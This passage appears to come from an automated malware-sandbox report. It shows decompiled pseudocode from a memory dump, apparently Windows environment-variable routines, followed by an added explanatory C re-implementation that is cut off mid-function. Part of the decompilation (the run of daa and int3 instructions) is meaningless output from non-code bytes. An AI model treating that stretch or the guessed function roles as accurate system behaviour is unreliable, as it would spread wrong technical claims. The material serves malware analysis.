                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                              									L23:
                                              									 *(_t114 - 0x94) = _t109;
                                              									goto L26;
                                              								}
                                              								__eflags = _t104 - _t92;
                                              								if(__eflags > 0) {
                                              									goto L21;
                                              								}
                                              								if(__eflags == 0) {
                                              									goto L22;
                                              								}
                                              								goto L23;
                                              							}
                                              							goto L15;
                                              						}
                                              					}
                                              					__eflags = _t109;
                                              					if(_t109 >= 0) {
                                              						goto L31;
                                              					}
                                              					__eflags = _t109 - 0x80000005;
                                              					if(_t109 != 0x80000005) {
                                              						goto L31;
                                              					}
                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                              					_t38 = _t95 - 1; // -129
                                              					_t99 = _t38;
                                              					goto L34;
                                              				}
                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                              					__eflags = __edx - 0x65;
                                              					if(__edx != 0x65) {
                                              						goto L2;
                                              					}
                                              					goto L6;
                                              				}
                                              				L2:
                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                              				_push(_t106);
                                              				if(E0192A890() != 0) {
                                              					goto L6;
                                              				}
                                              				goto L3;
                                              			}
                                              0x018eb171
                                              0x018eb171
                                              0x018eb171
                                              0x018eb171
                                              0x018eb171
                                              0x018eb176
                                              0x018eb17b
                                              0x018eb180
                                              0x018eb186
                                              0x018eb18f
                                              0x018eb198
                                              0x018eb1a4
                                              0x018eb1aa
                                              0x01944802
                                              0x01944802
                                              0x01944805
                                              0x0194480c
                                              0x0194480e
                                              0x018eb1d1
                                              0x018eb1d3
                                              0x018eb1de
                                              0x018eb1de
                                              0x01944817
                                              0x0194481e
                                              0x01944820
                                              0x01944822
                                              0x01944822
                                              0x01944824
                                              0x01944824
                                              0x0194482a
                                              0x00000000
                                              0x00000000
                                              0x01944835
                                              0x0194483a
                                              0x0194483d
                                              0x0194483f
                                              0x01944842
                                              0x01944842
                                              0x01944842
                                              0x01944846
                                              0x0194484c
                                              0x0194484e
                                              0x01944851
                                              0x01944851
                                              0x01944853
                                              0x01944854
                                              0x01944854
                                              0x01944858
                                              0x0194485a
                                              0x0194485a
                                              0x0194485d
                                              0x0194485f
                                              0x01944861
                                              0x01944861
                                              0x01944866
                                              0x0194486b
                                              0x0194486e
                                              0x01944871
                                              0x01944876
                                              0x01944876
                                              0x01944878
                                              0x0194487b
                                              0x01944884
                                              0x01944884
                                              0x00000000
                                              0x0194487d
                                              0x0194487d
                                              0x01944882
                                              0x01944889
                                              0x01944889
                                              0x0194488f
                                              0x01944891
                                              0x019448e0
                                              0x019448e2
                                              0x019448e4
                                              0x019448e4
                                              0x019448e7
                                              0x019448e7
                                              0x019448ed
                                              0x019448f4
                                              0x019448f6
                                              0x01944951
                                              0x01944951
                                              0x01944953
                                              0x01944953
                                              0x01944956
                                              0x01944956
                                              0x01944958
                                              0x01944959
                                              0x01944959
                                              0x0194495d
                                              0x0194495d
                                              0x0194495f
                                              0x0194495f
                                              0x01944965
                                              0x01944969
                                              0x019449ba
                                              0x019449ba
                                              0x019449c1
                                              0x019449c5
                                              0x019449cc
                                              0x019449d4
                                              0x019449d7
                                              0x019449da
                                              0x019449e4
                                              0x019449e5
                                              0x019449f3
                                              0x01944a02
                                              0x00000000
                                              0x01944a02
                                              0x01944972
                                              0x01944974
                                              0x00000000
                                              0x00000000
                                              0x01944976
                                              0x01944979
                                              0x01944982
                                              0x01944983
                                              0x01944984
                                              0x0194498b
                                              0x0194498d
                                              0x01944991
                                              0x01944993
                                              0x01944999
                                              0x0194499d
                                              0x019449a2
                                              0x019449a2
                                              0x019449a2
                                              0x01944999
                                              0x019449ac
                                              0x00000000
                                              0x019449b3
                                              0x019448f8
                                              0x019448fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019448fe
                                              0x01944895
                                              0x0194489c
                                              0x019448ad
                                              0x019448b2
                                              0x019448b5
                                              0x019448b7
                                              0x019448ba
                                              0x019448bc
                                              0x019448c6
                                              0x019448c6
                                              0x019448cb
                                              0x019448d1
                                              0x019448d4
                                              0x019448d8
                                              0x019448d8
                                              0x00000000
                                              0x019448d8
                                              0x019448be
                                              0x019448c0
                                              0x00000000
                                              0x00000000
                                              0x019448c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019448c4
                                              0x00000000
                                              0x01944882
                                              0x0194487b
                                              0x01944904
                                              0x01944906
                                              0x00000000
                                              0x00000000
                                              0x01944908
                                              0x0194490e
                                              0x00000000
                                              0x00000000
                                              0x01944910
                                              0x01944917
                                              0x01944917
                                              0x00000000
                                              0x01944917
                                              0x018eb1ba
                                              0x019447f9
                                              0x019447fc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019447fc
                                              0x018eb1c0
                                              0x018eb1c0
                                              0x018eb1c3
                                              0x018eb1cb
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0
                                              • Opcode ID: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                              • Instruction ID: 00f0c8458247485828571b61ddcab353c227e5bdc14dc0f7f784f84544f4396f
                                              • Opcode Fuzzy Hash: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                              • Instruction Fuzzy Hash: CC51FD75D0026A8BEB35CF688845FAEBBF4BF40715F2042A9D85DAB282C7304941DB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E01912581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200461, char _a1546912141) {
                                              				signed int _v8;
                                              				signed int _v16;
                                              				unsigned int _v24;
                                              				void* _v28;
                                              				signed int _v32;
                                              				unsigned int _v36;
                                              				signed int _v37;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				intOrPtr _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _t254;
                                              				signed int _t258;
                                              				void* _t263;
                                              				void* _t264;
                                              				signed int _t265;
                                              				void* _t266;
                                              				signed int _t274;
                                              				signed int _t276;
                                              				intOrPtr _t278;
                                              				signed int _t281;
                                              				signed int _t288;
                                              				signed int _t291;
                                              				signed int _t299;
                                              				intOrPtr _t305;
                                              				signed int _t307;
                                              				signed int _t309;
                                              				void* _t310;
                                              				void* _t311;
                                              				signed int _t312;
                                              				unsigned int _t315;
                                              				signed int _t319;
                                              				void* _t320;
                                              				void* _t325;
                                              				signed int _t328;
                                              				signed int _t332;
                                              				intOrPtr _t344;
                                              				signed int _t353;
                                              				signed int _t355;
                                              				signed int _t356;
                                              				signed int _t360;
                                              				signed int _t361;
                                              				intOrPtr* _t363;
                                              				signed int _t364;
                                              				signed int _t366;
                                              				signed int _t372;
                                              				void* _t373;
                                              				void* _t375;
                                              
                                              				_t366 = _t372;
                                              				_t373 = _t372 - 0x4c;
                                              				_v8 =  *0x19dd360 ^ _t366;
                                              				_push(__ebx);
                                              				_push(__esi);
                                              				_push(__edi);
                                              				_t360 = 0x19db2e8;
                                              				_v56 = _a4;
                                              				_v48 = __edx;
                                              				_v60 = __ecx;
                                              				_t315 = 0;
                                              				_v80 = 0;
                                              				asm("movsd");
                                              				_v64 = 0;
                                              				_v76 = 0;
                                              				_v72 = 0;
                                              				asm("movsd");
                                              				_v44 = 0;
                                              				_v52 = 0;
                                              				_v68 = 0;
                                              				asm("movsd");
                                              				_v32 = 0;
                                              				_v36 = 0;
                                              				asm("movsd");
                                              				_v16 = 0;
                                              				_t305 = 0x48;
                                              				_t342 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                              				_t353 = 0;
                                              				_v37 = _t342;
                                              				if(_v48 <= 0) {
                                              					L16:
                                              					_t45 = _t305 - 0x48; // 0x0
                                              					__eflags = _t45 - 0xfffe;
                                              					if(_t45 > 0xfffe) {
                                              						_t361 = 0xc0000106;
                                              						goto L32;
                                              					} else {
                                              						_t360 = L01904620(_t315,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t305);
                                              						_v52 = _t360;
                                              						__eflags = _t360;
                                              						if(_t360 == 0) {
                                              							_t361 = 0xc0000017;
                                              							goto L32;
                                              						} else {
                                              							 *(_t360 + 0x44) =  *(_t360 + 0x44) & 0x00000000;
                                              							_t50 = _t360 + 0x48; // 0x48
                                              							_t355 = _t50;
                                              							_t342 = _v32;
                                              							 *((intOrPtr*)(_t360 + 0x3c)) = _t305;
                                              							_t307 = 0;
                                              							 *((short*)(_t360 + 0x30)) = _v48;
                                              							__eflags = _t342;
                                              							if(_t342 != 0) {
                                              								 *(_t360 + 0x18) = _t355;
                                              								__eflags = _t342 - 0x19d8478;
                                              								 *_t360 = ((0 | _t342 == 0x019d8478) - 0x00000001 & 0xfffffffb) + 7;
                                              								E0192F3E0(_t355,  *((intOrPtr*)(_t342 + 4)),  *_t342 & 0x0000ffff);
                                              								_t342 = _v32;
                                              								_t373 = _t373 + 0xc;
                                              								_t307 = 1;
                                              								__eflags = _a8;
                                              								_t355 = _t355 + (( *_t342 & 0x0000ffff) >> 1) * 2;
                                              								if(_a8 != 0) {
                                              									_t299 = E019739F2(_t355);
                                              									_t342 = _v32;
                                              									_t355 = _t299;
                                              								}
                                              							}
                                              							_t319 = 0;
                                              							_v16 = 0;
                                              							__eflags = _v48;
                                              							if(_v48 <= 0) {
                                              								L31:
                                              								_t361 = _v68;
                                              								__eflags = 0;
                                              								 *((short*)(_t355 - 2)) = 0;
                                              								goto L32;
                                              							} else {
                                              								_t309 = _t360 + _t307 * 4;
                                              								_v56 = _t309;
                                              								do {
                                              									__eflags = _t342;
                                              									if(_t342 != 0) {
                                              										_t254 =  *(_v60 + _t319 * 4);
                                              										__eflags = _t254;
                                              										if(_t254 == 0) {
                                              											goto L30;
                                              										} else {
                                              											__eflags = _t254 == 5;
                                              											if(_t254 == 5) {
                                              												goto L30;
                                              											} else {
                                              												goto L22;
                                              											}
                                              										}
                                              									} else {
                                              										L22:
                                              										 *_t309 =  *(_v60 + _t319 * 4);
                                              										 *(_t309 + 0x18) = _t355;
                                              										_t258 =  *(_v60 + _t319 * 4);
                                              										__eflags = _t258 - 8;
                                              										if(_t258 > 8) {
                                              											goto L56;
                                              										} else {
                                              											switch( *((intOrPtr*)(_t258 * 4 +  &M01912959))) {
                                              												case 0:
                                              													__ax =  *0x19d8488;
                                              													__eflags = __ax;
                                              													if(__ax == 0) {
                                              														goto L29;
                                              													} else {
                                              														__ax & 0x0000ffff = E0192F3E0(__edi,  *0x19d848c, __ax & 0x0000ffff);
                                              														__eax =  *0x19d8488 & 0x0000ffff;
                                              														goto L26;
                                              													}
                                              													goto L108;
                                              												case 1:
                                              													L45:
                                              													E0192F3E0(_t355, _v80, _v64);
                                              													_t294 = _v64;
                                              													goto L26;
                                              												case 2:
                                              													 *0x19d8480 & 0x0000ffff = E0192F3E0(__edi,  *0x19d8484,  *0x19d8480 & 0x0000ffff);
                                              													__eax =  *0x19d8480 & 0x0000ffff;
                                              													__eax = ( *0x19d8480 & 0x0000ffff) >> 1;
                                              													__edi = __edi + __eax * 2;
                                              													goto L28;
                                              												case 3:
                                              													__eax = _v44;
                                              													__eflags = __eax;
                                              													if(__eax == 0) {
                                              														goto L29;
                                              													} else {
                                              														__esi = __eax + __eax;
                                              														__eax = E0192F3E0(__edi, _v72, __esi);
                                              														__edi = __edi + __esi;
                                              														__esi = _v52;
                                              														goto L27;
                                              													}
                                              													goto L108;
                                              												case 4:
                                              													_push(0x2e);
                                              													_pop(__eax);
                                              													 *(__esi + 0x44) = __edi;
                                              													 *__edi = __ax;
                                              													__edi = __edi + 4;
                                              													_push(0x3b);
                                              													_pop(__eax);
                                              													 *(__edi - 2) = __ax;
                                              													goto L29;
                                              												case 5:
                                              													__eflags = _v36;
                                              													if(_v36 == 0) {
                                              														goto L45;
                                              													} else {
                                              														E0192F3E0(_t355, _v76, _v36);
                                              														_t294 = _v36;
                                              													}
                                              													L26:
                                              													_t373 = _t373 + 0xc;
                                              													_t355 = _t355 + (_t294 >> 1) * 2 + 2;
                                              													__eflags = _t355;
                                              													L27:
                                              													_push(0x3b);
                                              													_pop(_t296);
                                              													 *((short*)(_t355 - 2)) = _t296;
                                              													goto L28;
                                              												case 6:
                                              													__ebx = "\\Wow\\Wow";
                                              													__eflags = __ebx - "\\Wow\\Wow";
                                              													if(__ebx != "\\Wow\\Wow") {
                                              														_push(0x3b);
                                              														_pop(__esi);
                                              														do {
                                              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                              															E0192F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                              															__edi = __edi + __eax * 2;
                                              															__edi = __edi + 2;
                                              															 *(__edi - 2) = __si;
                                              															__ebx =  *__ebx;
                                              															__eflags = __ebx - "\\Wow\\Wow";
                                              														} while (__ebx != "\\Wow\\Wow");
                                              														__esi = _v52;
                                              														__ecx = _v16;
                                              														__edx = _v32;
                                              													}
                                              													__ebx = _v56;
                                              													goto L29;
                                              												case 7:
                                              													 *0x19d8478 & 0x0000ffff = E0192F3E0(__edi,  *0x19d847c,  *0x19d8478 & 0x0000ffff);
                                              													__eax =  *0x19d8478 & 0x0000ffff;
                                              													__eax = ( *0x19d8478 & 0x0000ffff) >> 1;
                                              													__eflags = _a8;
                                              													__edi = __edi + __eax * 2;
                                              													if(_a8 != 0) {
                                              														__ecx = __edi;
                                              														__eax = E019739F2(__ecx);
                                              														__edi = __eax;
                                              													}
                                              													goto L28;
                                              												case 8:
                                              													__eax = 0;
                                              													 *(__edi - 2) = __ax;
                                              													 *0x19d6e58 & 0x0000ffff = E0192F3E0(__edi,  *0x19d6e5c,  *0x19d6e58 & 0x0000ffff);
                                              													 *(__esi + 0x38) = __edi;
                                              													__eax =  *0x19d6e58 & 0x0000ffff;
                                              													__eax = ( *0x19d6e58 & 0x0000ffff) >> 1;
                                              													__edi = __edi + __eax * 2;
                                              													__edi = __edi + 2;
                                              													L28:
                                              													_t319 = _v16;
                                              													_t342 = _v32;
                                              													L29:
                                              													_t309 = _t309 + 4;
                                              													__eflags = _t309;
                                              													_v56 = _t309;
                                              													goto L30;
                                              											}
                                              										}
                                              									}
                                              									goto L108;
                                              									L30:
                                              									_t319 = _t319 + 1;
                                              									_v16 = _t319;
                                              									__eflags = _t319 - _v48;
                                              								} while (_t319 < _v48);
                                              								goto L31;
                                              							}
                                              						}
                                              					}
                                              				} else {
                                              					while(1) {
                                              						L1:
                                              						_t258 =  *(_v60 + _t353 * 4);
                                              						if(_t258 > 8) {
                                              							break;
                                              						}
                                              						switch( *((intOrPtr*)(_t258 * 4 +  &M01912935))) {
                                              							case 0:
                                              								__ax =  *0x19d8488;
                                              								__eflags = __ax;
                                              								if(__ax != 0) {
                                              									__eax = __ax & 0x0000ffff;
                                              									__ebx = __ebx + 2;
                                              									__eflags = __ebx;
                                              									goto L53;
                                              								}
                                              								goto L14;
                                              							case 1:
                                              								L44:
                                              								_t342 =  &_v64;
                                              								_v80 = E01912E3E(0,  &_v64);
                                              								_t305 = _t305 + _v64 + 2;
                                              								goto L13;
                                              							case 2:
                                              								__eax =  *0x19d8480 & 0x0000ffff;
                                              								__ebx = __ebx + __eax;
                                              								__eflags = __dl;
                                              								if(__dl != 0) {
                                              									__eax = 0x19d8480;
                                              									goto L80;
                                              								}
                                              								goto L14;
                                              							case 3:
                                              								__eax = E018FEEF0(0x19d79a0);
                                              								__eax =  &_v44;
                                              								_push(__eax);
                                              								_push(0);
                                              								_push(0);
                                              								_push(4);
                                              								_push(L"PATH");
                                              								_push(0);
                                              								L57();
                                              								__esi = __eax;
                                              								_v68 = __esi;
                                              								__eflags = __esi - 0xc0000023;
                                              								if(__esi != 0xc0000023) {
                                              									L10:
                                              									__eax = E018FEB70(__ecx, 0x19d79a0);
                                              									__eflags = __esi - 0xc0000100;
                                              									if(__esi == 0xc0000100) {
                                              										_v44 = _v44 & 0x00000000;
                                              										__eax = 0;
                                              										_v68 = 0;
                                              										goto L13;
                                              									} else {
                                              										__eflags = __esi;
                                              										if(__esi < 0) {
                                              											L32:
                                              											_t232 = _v72;
                                              											__eflags = _t232;
                                              											if(_t232 != 0) {
                                              												L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t232);
                                              											}
                                              											_t233 = _v52;
                                              											__eflags = _t233;
                                              											if(_t233 != 0) {
                                              												__eflags = _t361;
                                              												if(_t361 < 0) {
                                              													L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t233);
                                              													_t233 = 0;
                                              												}
                                              											}
                                              											goto L36;
                                              										} else {
                                              											__eax = _v44;
                                              											__ebx = __ebx + __eax * 2;
                                              											__ebx = __ebx + 2;
                                              											__eflags = __ebx;
                                              											L13:
                                              											_t315 = _v36;
                                              											goto L14;
                                              										}
                                              									}
                                              								} else {
                                              									__eax = _v44;
                                              									__ecx =  *0x19d7b9c; // 0x0
                                              									_v44 + _v44 =  *[fs:0x30];
                                              									__ecx = __ecx + 0x180000;
                                              									__eax = L01904620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                              									_v72 = __eax;
                                              									__eflags = __eax;
                                              									if(__eax == 0) {
                                              										__eax = E018FEB70(__ecx, 0x19d79a0);
                                              										__eax = _v52;
                                              										L36:
                                              										_pop(_t354);
                                              										_pop(_t362);
                                              										__eflags = _v8 ^ _t366;
                                              										_pop(_t306);
                                              										return E0192B640(_t233, _t306, _v8 ^ _t366, _t342, _t354, _t362);
                                              									} else {
                                              										__ecx =  &_v44;
                                              										_push(__ecx);
                                              										_push(_v44);
                                              										_push(__eax);
                                              										_push(4);
                                              										_push(L"PATH");
                                              										_push(0);
                                              										L57();
                                              										__esi = __eax;
                                              										_v68 = __eax;
                                              										goto L10;
                                              									}
                                              								}
                                              								goto L108;
                                              							case 4:
                                              								__ebx = __ebx + 4;
                                              								goto L14;
                                              							case 5:
                                              								_t301 = _v56;
                                              								if(_v56 != 0) {
                                              									_t342 =  &_v36;
                                              									_t303 = E01912E3E(_t301,  &_v36);
                                              									_t315 = _v36;
                                              									_v76 = _t303;
                                              								}
                                              								if(_t315 == 0) {
                                              									goto L44;
                                              								} else {
                                              									_t305 = _t305 + 2 + _t315;
                                              								}
                                              								goto L14;
                                              							case 6:
                                              								__eax =  *0x19d5764 & 0x0000ffff;
                                              								goto L53;
                                              							case 7:
                                              								__eax =  *0x19d8478 & 0x0000ffff;
                                              								__ebx = __ebx + __eax;
                                              								__eflags = _a8;
                                              								if(_a8 != 0) {
                                              									__ebx = __ebx + 0x16;
                                              									__ebx = __ebx + __eax;
                                              								}
                                              								__eflags = __dl;
                                              								if(__dl != 0) {
                                              									__eax = 0x19d8478;
                                              									L80:
                                              									_v32 = __eax;
                                              								}
                                              								goto L14;
                                              							case 8:
                                              								__eax =  *0x19d6e58 & 0x0000ffff;
                                              								__eax = ( *0x19d6e58 & 0x0000ffff) + 2;
                                              								L53:
                                              								__ebx = __ebx + __eax;
                                              								L14:
                                              								_t353 = _t353 + 1;
                                              								if(_t353 >= _v48) {
                                              									goto L16;
                                              								} else {
                                              									_t342 = _v37;
                                              									goto L1;
                                              								}
                                              								goto L108;
                                              						}
                                              					}
                                              					L56:
                                              					_t320 = 0x25;
                                              					asm("int 0x29");
                                              					asm("out 0x28, al");
                                              					 *((intOrPtr*)(_t360 + 0x28)) =  *((intOrPtr*)(_t360 + 0x28)) + _t373;
                                              					asm("daa");
                                              					 *_t360 =  *_t360 + _t366;
                                              					_t263 = _t258 + _t373;
                                              					 *((intOrPtr*)(_t360 + 0x28)) =  *((intOrPtr*)(_t360 + 0x28)) + _t263;
                                              					_t264 = _t320;
                                              					_t325 = _t263;
                                              					 *0x1f019126 =  *0x1f019126 + _t264;
                                              					_pop(_t310);
                                              					_t265 = _t366;
                                              					 *((intOrPtr*)(_t265 +  &_a1530200461)) =  *((intOrPtr*)(_t265 +  &_a1530200461)) + _t342;
                                              					_t266 = _t264;
                                              					 *_t342 =  *_t342 + _t266;
                                              					 *((intOrPtr*)(_t325 - 0x6ed77fff)) =  *((intOrPtr*)(_t325 - 0x6ed77fff)) - _t342;
                                              					_t363 = _t360 + _t360;
                                              					asm("daa");
                                              					 *_t363 =  *_t363 + _t310;
                                              					 *((intOrPtr*)(_t266 - 0x6ed7b1ff)) =  *((intOrPtr*)(_t266 - 0x6ed7b1ff)) - _t342;
                                              					_a35 = _a35 + _t310;
                                              					_pop(_t311);
                                              					 *((intOrPtr*)(_t265 +  &_a1546912141)) =  *((intOrPtr*)(_t265 +  &_a1546912141)) + _t363;
                                              					_t375 = _t373 + _t325;
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					// Function entry: the two pushes plus the call are the SEH frame-setup pattern
                                              					// (local-frame size 0x20, scope table at 0x019bff00, prolog helper E0193D08C).
                                              					_push(0x20);
                                              					_push(0x19bff00);
                                              					E0193D08C(_t311, _t355, _t363);
                                              					_v44 =  *[fs:0x18]; // TEB self pointer (fs:0x18 on 32-bit Windows)
                                              					_t356 = 0;
                                              					 *_a24 = 0; // clear the caller's output dword before any early return
                                              					_t312 = _a12;
                                              					__eflags = _t312;
                                              					if(_t312 == 0) {
                                              						_t274 = 0xc0000100; // STATUS_VARIABLE_NOT_FOUND: a zero-length name (_a12) is rejected up front
                                              					} else {
                                              						_v8 = 0;
                                              						_t364 = 0xc0000100;
                                              						_v52 = 0xc0000100;
                                              						_t276 = 4;
                                              						while(1) {
                                              							_v40 = _t276;
                                              							__eflags = _t276;
                                              							if(_t276 == 0) {
                                              								break;
                                              							}
                                              							_t332 = _t276 * 0xc;
                                              							_v48 = _t332;
                                              							__eflags = _t312 -  *((intOrPtr*)(_t332 + 0x18c1664));
                                              							if(__eflags <= 0) {
                                              								if(__eflags == 0) {
                                              									_t291 = E0192E5C0(_a8,  *((intOrPtr*)(_t332 + 0x18c1668)), _t312);
                                              									_t375 = _t375 + 0xc;
                                              									__eflags = _t291;
                                              									if(__eflags == 0) {
                                              										_t364 = E019651BE(_t312,  *((intOrPtr*)(_v48 + 0x18c166c)), _a16, _t356, _t364, __eflags, _a20, _a24);
                                              										_v52 = _t364;
                                              										break;
                                              									} else {
                                              										_t276 = _v40;
                                              										goto L62;
                                              									}
                                              									goto L70;
                                              								} else {
                                              									L62:
                                              									_t276 = _t276 - 1;
                                              									continue;
                                              								}
                                              							}
                                              							break;
                                              						}
                                              						_v32 = _t364;
                                              						__eflags = _t364;
                                              						if(_t364 < 0) {
                                              							__eflags = _t364 - 0xc0000100;
                                              							if(_t364 == 0xc0000100) {
                                              								_t328 = _a4;
                                              								__eflags = _t328;
                                              								if(_t328 != 0) {
                                              									_v36 = _t328;
                                              									__eflags =  *_t328 - _t356;
                                              									if( *_t328 == _t356) {
                                              										_t364 = 0xc0000100;
                                              										goto L76;
                                              									} else {
                                              										_t344 =  *((intOrPtr*)(_v44 + 0x30)); // TEB->ProcessEnvironmentBlock (PEB)
                                              										_t278 =  *((intOrPtr*)(_t344 + 0x10)); // PEB->ProcessParameters
                                              										// ProcessParameters->Environment (x86 offset 0x48) compared with the _a4 pointer:
                                              										// only when the caller passed the process's own environment block is the PEB lock involved.
                                              										__eflags =  *((intOrPtr*)(_t278 + 0x48)) - _t328;
                                              										if( *((intOrPtr*)(_t278 + 0x48)) == _t328) {
                                              											__eflags =  *(_t344 + 0x1c); // PEB->FastPebLock
                                              											if( *(_t344 + 0x1c) == 0) {
                                              												L106:
                                              												_t364 = E01912AE4( &_v36, _a8, _t312, _a16, _a20, _a24);
                                              												_v32 = _t364;
                                              												__eflags = _t364 - 0xc0000100;
                                              												if(_t364 != 0xc0000100) {
                                              													goto L69;
                                              												} else {
                                              													_t356 = 1;
                                              													_t328 = _v36;
                                              													goto L75;
                                              												}
                                              											} else {
                                              												_t281 = E018F6600( *(_t344 + 0x1c));
                                              												__eflags = _t281;
                                              												if(_t281 != 0) {
                                              													goto L106;
                                              												} else {
                                              													_t328 = _a4;
                                              													goto L75;
                                              												}
                                              											}
                                              										} else {
                                              											L75:
                                              											_t364 = E01912C50(_t328, _a8, _t312, _a16, _a20, _a24, _t356);
                                              											L76:
                                              											_v32 = _t364;
                                              											goto L69;
                                              										}
                                              									}
                                              									goto L108;
                                              								} else {
                                              									// _a4 == NULL: the process's own environment is used. PEB->FastPebLock (fs:0x30 is the PEB,
                                              									// lock at +0x1c) is handed to E018FEEF0; E01912ACB below is the matching release, guarded by
                                              									// the SEH try level in _v8.
                                              									E018FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              									_v8 = 1;
                                              									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                              									_t364 = _a24;
                                              									_t288 = E01912AE4( &_v36, _a8, _t312, _a16, _a20, _t364);
                                              									_v32 = _t288;
                                              									__eflags = _t288 - 0xc0000100;
                                              									if(_t288 == 0xc0000100) {
                                              										_v32 = E01912C50(_v36, _a8, _t312, _a16, _a20, _t364, 1);
                                              									}
                                              									_v8 = _t356;
                                              									E01912ACB();
                                              								}
                                              							}
                                              						}
                                              						L69:
                                              						_v8 = 0xfffffffe;
                                              						_t274 = _t364;
                                              					}
                                              					L70:
                                              					return E0193D0D1(_t274);
                                              				}
                                              				L108:
                                              			}
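The routine above takes six arguments, returns 0xc0000100 (STATUS_VARIABLE_NOT_FOUND) for an empty name, first tries a four-entry table of special names (length compare, then memcmp-style compare, then a per-entry handler) and otherwise resolves against either the caller's buffer (_a4) or the process's own environment block reached through TEB -> PEB -> ProcessParameters -> Environment. That layout is consistent with a query into an NT environment block, but the report does not name the function. The following C program is an added example, not code from the report or from ntdll: it re-implements the lookup semantics portably over a constructed UTF-16 environment block (NAME=VALUE strings, each NUL-terminated, block ended by an empty string). The status constants and the x86 structure offsets in the comments are documented Windows values; the exact behaviour of the callees E01912C50/E01912AE4 and the in-character buffer semantics used here are assumptions.

```c
/* Added example: portable lookup over an NT-style environment block.
 * Not ntdll code and not part of the sandbox report; the callee behaviour
 * it mirrors (E01912C50 / E01912AE4 in the listing) is an assumption. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

typedef uint16_t WCHAR16;     /* UTF-16 code unit, as stored in the block */
typedef uint32_t NTSTATUS32;

#define STATUS_SUCCESS            0x00000000u
#define STATUS_BUFFER_TOO_SMALL   0xC0000023u
#define STATUS_VARIABLE_NOT_FOUND 0xC0000100u  /* the constant tested throughout the listing */

/* ASCII-range case folding only; the real loader uses Unicode upcasing (assumption). */
static WCHAR16 up(WCHAR16 c) { return (c >= 'a' && c <= 'z') ? (WCHAR16)(c - 32) : c; }
static size_t wlen(const WCHAR16 *s) { size_t n = 0; while (s[n]) n++; return n; }

/* Query `name` (name_len code units, not NUL-terminated) in `env`. On success the
 * value plus its NUL is copied into value[value_cap]; *ret_len always receives the
 * value length in code units (excluding the NUL) when the name exists, else 0.
 * Mirrors the listing: reject an empty name, compare lengths before contents. */
NTSTATUS32 env_query(const WCHAR16 *env, const WCHAR16 *name, size_t name_len,
                     WCHAR16 *value, size_t value_cap, size_t *ret_len)
{
    *ret_len = 0;
    if (env == NULL || name_len == 0) return STATUS_VARIABLE_NOT_FOUND;
    for (const WCHAR16 *p = env; *p; p += wlen(p) + 1) {
        size_t entry_len = wlen(p);
        const WCHAR16 *eq = NULL;
        /* start at 1 so drive entries such as "=C:=C:\..." keep "=C:" as their name */
        for (size_t i = 1; i < entry_len; i++) if (p[i] == '=') { eq = p + i; break; }
        if (eq == NULL || (size_t)(eq - p) != name_len) continue;   /* length check first */
        size_t i = 0;
        while (i < name_len && up(p[i]) == up(name[i])) i++;       /* case-insensitive compare */
        if (i != name_len) continue;
        const WCHAR16 *val = eq + 1;
        size_t vlen = entry_len - (size_t)(val - p);
        *ret_len = vlen;
        if (value_cap < vlen + 1) return STATUS_BUFFER_TOO_SMALL;
        memcpy(value, val, (vlen + 1) * sizeof(WCHAR16));
        return STATUS_SUCCESS;
    }
    return STATUS_VARIABLE_NOT_FOUND;
}

/* Constructed sample block (not captured from the sample); ASCII widened to UTF-16. */
static const char *const SAMPLE_ENV[] = {
    "=C:=C:\\Users\\victim", "Path=C:\\Windows\\system32", "TEMP=C:\\Temp", "USERNAME=victim",
};
#define SAMPLE_N (sizeof SAMPLE_ENV / sizeof SAMPLE_ENV[0])

static size_t build_env(const char *const *entries, size_t n, WCHAR16 *out, size_t cap)
{
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(entries[i]);
        if (pos + len + 2 > cap) return 0;
        for (size_t j = 0; j < len; j++) out[pos++] = (WCHAR16)(unsigned char)entries[i][j];
        out[pos++] = 0;                 /* each entry NUL-terminated */
    }
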